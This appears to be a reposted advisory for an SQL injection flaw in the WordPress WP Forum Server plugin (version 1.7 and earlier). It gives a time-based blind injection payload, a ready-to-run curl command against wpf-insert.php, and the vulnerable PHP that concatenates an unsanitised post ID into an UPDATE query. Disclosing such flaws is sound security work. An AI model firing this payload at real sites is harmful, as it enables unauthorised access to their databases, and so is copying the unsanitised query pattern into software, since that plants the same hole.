WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability

—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20&subject=1&content=1&thread_id=1

e.g.
curl –data "edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20&subject=1&content=1&thread_id=1" http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php

—————
Vulnerable code
—————
if(isset($_POST[‘edit_post_submit’])){
    $subject = $vasthtml->input_filter($_POST[‘edit_post_subject’]);
    $content = $vasthtml->input_filter($_POST[‘message’]);
    $thread = $vasthtml->check_parms($_POST[‘thread_id’]);
    $edit_post_id = $_POST[‘edit_post_id’];
    …   
    $sql = ("UPDATE $vasthtml->t_posts SET text = ‘".stripslashes($content)."’, subject = ‘".stripslashes($subject)."’ WHERE id = $edit_post_id");
    $wpdb->query($sql);

发表评论?

0 条评论。

发表评论